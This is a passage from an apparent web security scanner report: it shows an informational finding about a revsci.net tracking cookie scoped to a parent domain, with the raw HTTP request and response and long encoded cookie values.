wMqMwfz78x2/lwMdBc718wm9N0yiUeMhkKks0s6qW7Xqw2SdQdbDFvcXvzULW3qgFeAHvDwPmPHSziub0EvZeJKWzWWLHuv+U0FoosdBa2NxEVGDk8II9ZWVCLqCDL/5SWW1N/bQ4FqFCqEumS/l+Cb5gTx4vs5ghq8bRjVGN1VK/GaZws6AK5kvkaCpwgwxns+nFQ7407k/fZs/Q/hP4MF1L4wSZYILbNBMPy/vnTMt8BStSq7RAAmKLE8/P7dPuVq8ktYnT2j52Bhr3mncphtNRpccpgn46S5JYO9scYAfaOmgvR89MT4APLRY7zrwYDa4hVKyShzQSWcni9E/1KIg7ZL5sRorT/nlYJWmzz0Pj5HyAJmC4tX7pqB1EQFrxRXeQKJKEK35yYg0UxKdKfPQtNY2wnalRD54z8z/mWLqlDSzHKbpOkrkhxTD/h9jP3ilRdtKXR56JZLb4UbZw8ZQDLz9fmnYRz4FVQpMulh0nk4/KPn+Wq+QKBBQjJogtz2RqlVfkHNmWgQTIM9rF57AAQK3nKJLI1lrdzVAnNIEVzBXDv/yOcyc/PZ9vT5nM8oudLSOHCuLua6tWHcHGGKJEbUnyMRWyU4hF3igiUJLznr2fW20c+mxVfTP6sns+qGFxMOwbT7fu8PscSzP19tIuNGzPflAD+a/nAX4lrGgmvKeXk3QjrCe+FnJY1OpieYm0UvLt2a35gPUVMf/T2wuEZlxxtGFAkn97MYdOamea5K6GTdP5ecy/OLjp65PsDjKzDXILmdYWXagRfngLj3wQpRmPUUznFzSi+X8rkaRrygBJIUyRAhprrb/dL2r+2Vqd75TQD/cVYe/Sb2a/ad6XsAyl8ppmF8v23m/WMY1jvepKa0SNMoTBL3fy7LpvCANROWBbLeeZDFBnKUTUu2jRK8Lr9pOWjZE3J6S9o1SFSfOYQDxH3DoyDP/y5L5EL6O6WTMV4DFPGLdcJE6SU2S+O5G7kJl/3grE/rIdhc4wBmGg==; rsiPus_IDRv="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/ktJjXbTc7xC8rSTKo6YlN1SF65yjPkBdccmYgL3fXlC8jgQbCNcghgKhJHvUKjibqhupRmr2CSQa7wV3rosFmZ67xtb1h+VVQrXfy4ehlUTg8bMa2IRGK29mv1rf4xQj5DJiX+oeD/hnd5ru+y4pEJrTtyha4y7+xVZ+07KQ1vrfuatTe+1XIuntKVByeKSa5GjJ0+NiSRkiA4gTwsh9Wo49VbeYeG33svkQyKx2nBHu1X9HvM1NOMBCclsB5LPMEfUKHEA7zYQujJVSHopUraI4LdCYd0j7nw/7TF6PSj498OtuChiwbVc//IBunlX4PPJToOIdpWG1WGRkZ5U+cn0Kj9jmmwTCES2saUS5GMcsW/DXLWzISDt0uEbVNX3B1vZEed6NdqdBkStWLbrNQHLrFl3i5zp3BI3NpSyty5GJjEokmuhKYFbFUB52dQe0ts/ZUiQjV6sni6UujDfw6Yr0L2e8v1Fsmap3BNhbvfJ2B08tqGXEV3vpJiDAtOJ0/CoKAvSE4e1qLnZfsLujzSsguE9hpOstHVIZ1S5jG7vOR0oYtjTMikoPV1Q1hjjIQ4/pxAY65mS4Evb3s+0aMaPowEXYV2gBTjR7SpK3IFaknqXR61Nm2O8IqIVX+J0mGQWzRRBm1Zu3rOZMoVtl4L9W/OpjBs3qexeOminO9R98+GJGqcXz6sd11kVQB9WjuW8Fmubsm0IB2m/Ynub0uZ9OCpEp8z4vQqPA7Ko+Cz7PXoaP126GjIVFaSICxoY2RqXoCFZi3KU6JFa6kfjp+QY4i/gH5yR2KvFtj9dghTXDajDg+7MnBW3RWS/IHmZqhyEEe0DuaFY7W/T5FHjWKal4wyQKB6xwBwWbA1+jW9PpYwHsmtJ3JnrK3XCydnoW28tWesMZS4JFy3uVgCRzC+akPxyOBjvxgMs3ifZxq7RJPRUHCPQXH6MTJazoh+D39NXc14zW0+86JXhG7MgmS1B5S38HoJbRca8dgMt49KTI028/pUCNKuTkoK8Cb2IDo9jkK12xn4aZDqwtOO1O44zuwvNNSix6YhIPHVJUsw6oQ9au+N8B0Llw7O/CLDCZmUTUp529HNqpmciGBK+zYdIgGYZQyCjJpDVNRLvf2om1fWscCZRnBzjUZElSbhwnzogQUasLBANIrZ0oJjm7B0qc7tTc7rADfAaEU/F14BgyyL+QmcwSqE7nHeOxVuHOjVRCGwQVe2iyQKB3/jmXGQV5nrQdG2gF0MfOlpkLZRBBffypRakLxr7hWWi12AvJAajemUAB1cC/ugiQnTqbmt6gTQ8aLzKdA1J7f5w=="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8q/n8RHJiFTfZw+jQwrsBibDv6FE0by7wXSZvEeljrlKAh9dwxHk7ExeM2+IrYKT1Ft7dNBg1x2Qjxz8/zBZ8kiU/YqaQ/UOp7WxojFl6Bi/CWrd1S5STjWG25FAOwRDxY6oikceGSEZfYtKK4DxmUo0J//6ggQMwCfLURDcSUpOAWiA9vUNIj4pz3Cw+U7rTy0hPQqSrtbA66B5kFtE1P8TDUherk0n6HV/dIZFG/IkSQ/UEF0QCB0BEG3a9uQX3CQC4yOylDHrrScn9vd51iqfuw99lCDChbcFXz+WxPXuCqNu/bgygy4tmNkZO25SZLZWaMRkEyJ/9luf2te0/du4eEWtieXpjJNURgFdfGFIZdTCD9s9skCKNexSmfJFrnBB4XQPVwE2ZleD3BWP3RgOqqH9HPHBlNyI6/pq0Q3QJcRwYA1m4lUcWSfsyI70dNh2U9k6ZX+u2jCeSNM1Fjo93jcW9t2nCNHmY0ZarNyHYB+R5IAw8ItvdgfR6vY/IobO3Y1LM1cHqtL0nxCDwgkxxRWakz3UHGCdW5gu8xl+S5lSVSzC68EQLryJ2kL/M+9wzdzfYJRZ4rV3n+z1mPC4RG2sCPSKnvojwQRRuEoODehYR8w8Jf3aJfrvhhc1NpBCWef7U4XkSvjxEDPql593RxJyB0bOZOuWgOBmK4L81yE9k+I3EzhSglvcMKsOLsiKjp2EYHE3xgt4QYZ0TLeTQ9H99Cg+YXI4UVaTVFky+rbh3ZsF6cesfvVvVOrtlKoAnGc9+aQNP4+fViDg1D8KGg6TLSutVdjc2BNQeGlnPwESwwvyxvFawd1s/H9g7OUBg2n8/mbc6kdDdOZ+6903QZtAZrdukSTVml0tPpIT+DjDAQNHDnDaSDkLldAdCeyzqqeREUTiwbtsuh4u/5G81kgGX9QreEKfdBIpIp+DkBVtq/AFYrt1rtaRtT45/gkc+iLrX2A/cjC53QYgqh+FxD9IpE2cBacF+1bg7KhbbF+P6m8TZNnW2WKnKFugeqQDLabwu+SfYovFkpitNY9HN9lqAJA35F2ghbHGw/iIu/X0Mg8UgeCA0qttICpzyx52M9TCPMtmQ31GEzMRakkshAUqVR6fpUT/wAX6bnHqAjXeuBY3cSz2GO1g39B95wNyNNEOYM8N7+QBARs/I+C4M3vHPgufQh/5NkunOmxdFfIyAedFXcb6Mf5DlDtxyHvgZB6sagfsFzKOAu1Y6IT6b9RHafSw7MCCQmeyFgP0HLxVt/Vkwm+kVOoyEmqDW++nndgxpFngSiNlHaKTXgWl6biJHD6hPQstV4Wj9pedtZ6lk9/hp9wDxCd0u6K3S6XtmXbeQa9+g5CWFYEKPfrSfc0kisnrPU/NGZfSioNw4nTCIvCHQNn3bnogv4OtFH9OwMBT9uneiYy7czQOSpjKbT6hYfQNAvdcO7oFaZSZIhfUwHBau9UYI47h6Ac4ybEciOHLID/81s1PgmEfsYvflK3QEr/94glwixB8mAR8HTbXIM0pQiIcMmSGMupODDjD6XKaZW7dBe2nl7bvjWWBjV5pcfZn2faKQXmBJwLyJffhhnaVQ1RtPmPB3aR62g2nurWr8ra585KTgTH/O1InpTxOaxeTi8crsUcWQPh4xFC3BgE+lYVP82JaxM3SFXi4/EtpM4+R557Hq8WcZ7TsCWIXYUjH5NmI3Cyq25yiqxRUJQsv+2WKgiEHqk2YPjQKTg0/SVgOQsTrr3r9CgA0EEK2v9V1"; rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJC32dXLnKG/pV+zq2jLxL9x1pNHcD2ocpIiv/mxMD/xw6JhTycr5wS4UUa4TNPNDPv1QWh8gkmOOsH9rraddoccklFuNdzYOTGbveI5B67GeW6vLj+wWQEAWvERBw6jjPQ4L4Uubk0NaY9wI2qrKXBEJqalRFyzz++kuS0t8FA35bmxx0VW/Jj5TEabtOAJFHV+aNKdWI3SWQJ9jz0Bw9jAtbfMu/qQH+JwD1NWyRhr+2kr+wlN2b1z5lAdiCkUa0tKYvCvYcqJvNr2DqBzL0LgZXnZiFpr9375ifqe1pBlZ259HXaBJ50bcPs5W6UrbuxwwykkmBfvTGdhY6R36hDP9GcRo3IMQKLboYAZUAD6b705sfN2AyaDbgmLf3ZERjZTjw5bBLQ9fbKsIhBlYFUM4XFud47GCjJTwGuwc1LM95tG5AFzx9tnwsgvVNaovbwq2L9N/YKANEQv8X2qIyy+X6kp2cftNCti+H/Mo2rVdkgJCsP3UD+93xiMalvHSCjPY/f0Ggge2DmqzGSaA2E+3WueaanEnXeCH3+RWIRF2FqOQFCVURqqUduXEPfccX758dXbqtZi3XBDREuv8aFdPycc4bkRAKj5Ej5TNhNp931pxyaxr2t1R2GgZPdkg/t02HCA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNhqsMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpen5bmxx0VW/Fj5TEabvOAJFHZ1HkqHXXxqnjiC3oOweMZPKJLGVy0b/FZGDDHvWZWoQFYW/Bxx6OKyvNtqrQYP/DuRMuCpad6JLNu5xR3q3Nz7Qafk8Wq0LRY+14yoBM4tWDmrZdvSSuqy1TjL0tuKvI8mNIoh7KrEbQwnjBb1/LfBb8nXVzAZA1i6C8Xdm0cMC9LidpZlbEH3XMd5Xgw4jfPzI/b7RAI4gMLDLzP+SdEy0AQx9DXaeNTmC2s6HbnJgfP+I0tgk7tyNj/CzYfV5FHctMqOrpkDoPgnKfInXmzo8eN7M6w6+YxBKDqMIqbxukpogdBn+UtZBuolunW41Y23J+N63iY00FAXcAE73YN/Dql57qFUu6dll9801fT3qLLPaNP+b9FIoBf32eAwseHayTwczmXBz1WltFamSD3GIRixAc8atcD/KfEOirCTjLCfULuN/9AbhoDQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:06:16 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:06:16 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.172. http://pix04.revsci.net/I10985/b3/0/3/1008211/616476492.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/616476492.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vuj41246c95NOaRAsl5hE/RAIN0jCKWeIrwU7hjL6yZdj93XkHnxuY5dXdsfw5hXREUlMqNPwkFtFYTAJwanBh5yYsGo3OuU23g4Sg+m/4oPiiW7+wP+sVJlWRijizVDRqGD+7XWyoETDu18Mfh38sGaLcBo3I8QKLVIHNbs/aPybUAp6deZ4PBam+j59FVp3j+OlK6mRTtV96HqNd0fyLSobj39hOpsGmZ9PBCS6PKnceOCU88KZYLjs9D/ogMjd3GXexqu6MMY+wrZ69abotqDqceVMfHYfc+u2rmmXQ4kjNvvzLnMiPUxpeWc6y6IrrLSU0aP1/RHBvaBGvVfQk5WA2CVlofLvT7Y9pNS4wEX/g0OMG57+/q0VMPqW9uJ3RN9aKoReMYds9lT5peBWgS5ahBACNkesRy++rBErZAYD7SmpB6lcs/JNNNw=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:25:18 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/616476492.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_umtR="MLsXtSMNJyhvJZH0ecXcxPALrEtuUCF+UoWp6s1TaE6wvo9hITCojHr8VbDr0WNwilV5b/Z3D/wKDgvE+mu/ihtvDaMnTyFIWETR0TVcemT1DbgKjv2dFDxn8Tk+AoDE7qB5NkL3BCLNtF8WOI2Q86nHKLUSblMIVr0cU5aS80fbE05TS4CRM4rZ9uu10SHPeIIE8eCTHW+uvp4MtY6Js0eNo77gKLoD5RCcLU5FiKo7EICZ8pV41fCaBCPe4RIcjM9BuydSRbmXImr7xi9Go66UfyakuI3vL+s+W6OzwXZGgJ/lLWX37Z4Ipqi6XnaIaz2q0k4CxXvRVfQRJx70UoecikljXaE9b6PfzHyuzE2LW2JEvyyowaUnZhKaCdL3LR4uywGje9tIdlQDt1qBuKtyb2k+yBKE3qUhYP+cNwKjrCn/YZaPSXYbhbt+eQmm9HlUi/cE8IzEdXPvAhYm/x1OJm5ocwy8kccNqeigZfHoWW/ul2NuVcgTHFTtPqenOFUcNgw/GYKyyOIdDDQUDc74KdslNSbwaGVjvhSxocyq1f0ng5zgZqz3NX3fWPvJYeQJthy1lrHebzT1PpFh/oAZYxO3Lx2JgFEcjha2HPzh1G9jX6IHPg2TtXpoGNglL8O/nYOADDqJYS/6rOIoy2hgqRkazmEr6b3n7k4VSUjV+xWnsyKCJEnDGYOApo2i4qjOMw6pzAvZJ7X9jpbO9O2OYbd7VHuKI7tTg5H8dmaxWMpfABe3FryyhRAhFF/msed+QUJ7rUkmWcid9h5/FYsF0SdJ8H6PJIeEx2K9AhBbpABY1chc8yKdRE+87RTtF9uIikjws1xC0NY2X6/bGb/mr0ByFw7YmUr5LQEC7on+ScO3cpBDe8Vf39VFXvIdqd8bkPht+0kDvSj5Qw1+fnl/nenG+qY5xVwG0TMVudzO3piMMAaLm9Dh6V/q9Yir7w143SrzRwQvZKvF3vTeJBdzTED/s4jvL87wPrizDzWAYogASdpFMHxHqKQsfenaRNcaejyHySle3BUGgcPiJDQ7nEPhHUaMuu+jpiydmb5XeMIMUmrAV21FO65JZUEByrZCZz1VdeWfKk3LTFO0BsrDKFGJzM7ikoiKnOCQRK9DwjG87F7YAjCnQOmEZsoz5vlmMpBy0cRHXS7oxEXzzDeyiEK03uUvZU99rfHt7t2W+jYS4oNy10p4D0tIeTRmFH1iTHZ7NsW+w0DzLoC0qoFXStoPcwUjVLG5LXdQBO7QeX5INgvps9cSzYyojxGbOpqhSuf34fq2PM2z3wAs0T4jRx37VsqmMDvtA3prRZ6PJwTdTxZTe2xk7yQyXnBTM5oQ/IpF7bGSptZbXOWRpT9Yc8QO"; rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NG/UTjJLypNPMu8j89fd7oQaFd1yGE6g8BwU8BLTkNk43VRyXa3Ndixdjs6IVM0zHk7FSaVnedyaWLSCh7NPV1RdW7jxad/LZqAKkQI2sIKbIjl/NCMgAjubZLgqHYaas/r4BUehWWM9HDtG5VYAXizGb0Z1krvC5z67DxDZFkxEELUQKDUeKVdafc4Jx9UWu6Mr2gv0NvqJG4xJF4Pwd94ADjGfyJL9BchtTR2Jgbu504d/PKipCwS9Xe59Yhf0QpOI+FlyFpfHT/nK2k6Q19kdGmwwEBRzBETenkVnLuiOfuj+Fgy0zl8puM319shjYxozGq1Ev6COKyaz0ynnuvE8qGeQa5tKO2RisBVk69iZdsLTWcsFHZz0gyTtcIiPRpJoNpedWWlzB9xfF1rageJwjgTjb6qIk5VV6z+edkqFG4LfoAl2pt0oWkohD9tV2Q2yUDMb+JG7zz4u7iQSYlbdHHIMi/4tkXYh+1HE9D8bu9KxoengULxPdthpplIBL+ZwEE5aBQSRXqkNJFh0Ei5rS+JP2fhjyMohubGzQ7CxNQO24NWurKi8YfO64uca2p5XJKopOL/ow6aYePp1MwoS5w8ecleWV5FXTlO/5hJcgUREU709POR+RUXKP+ldij0prpJCjhTi8MXvDm9lB6ZBxdj8le9VmqucTxBJGPBoGHJR4In+8q7uAVv7gAmQmWJQ31t2MDuyF21i876et1XsmB+ZwEmLMBPwi9Qfy4yfg6YB4ODmYjSDzI5zhnpwZeeQPM302wZDi2snb13gcNTQpJ9t8MMwFlbtk5CCJ7XPf6pNxDaI9xsBS4iSUg4vxPrKXujg2SGfA6OhxbG7n9/py50g8LD5dlTDYWrTUDkIvHroa9irk6vjE0B8LTb346tHfXfg9v+7PCy3JWQ2wMMeuF3ouIvHadJgmzqyRE5NjQAlvjhb6RPMisgATNFuOC3dfaXOuwq0R+xjUjSRFfT8L8JMl40MQuusmiKNVifE44rZDG2oWMRyIfgDhZX4L98YighsOSwFfUjjRcZ5+OpBHUG0B2DmsrZSeXZ/WnnLjF6MXTR3t61NidejblNmQZrvYkwdgwyVP/eZooADCjNhuXIGmtWMrOhHEQXKWRaVTIpQLyL687W27Pqgcm3BGmMFP3GDSVqhVrGveoHOqiclrRer07RLby8Cjajp5xWpLTkPvuasrua48DAf/MmhS7mnbOziUKwj6W8ZTxbXV+syCKWGMCjNCV1eG0UL/BCBsIxV0Hgym+KD2qdH5i/lDYQnS42a6fKAfEJxgWriuHYxF0zXPPetlOMs9okJdjdTAws46KrFu/UGlX+jA0W3dF6ukPpSd0u4L3i2fLelL+/+YijDJqLIvaTmn3De08hknUPYccXE7hhr5ozxO/0DWiztj7fU4gvY2tHHFIwzMWb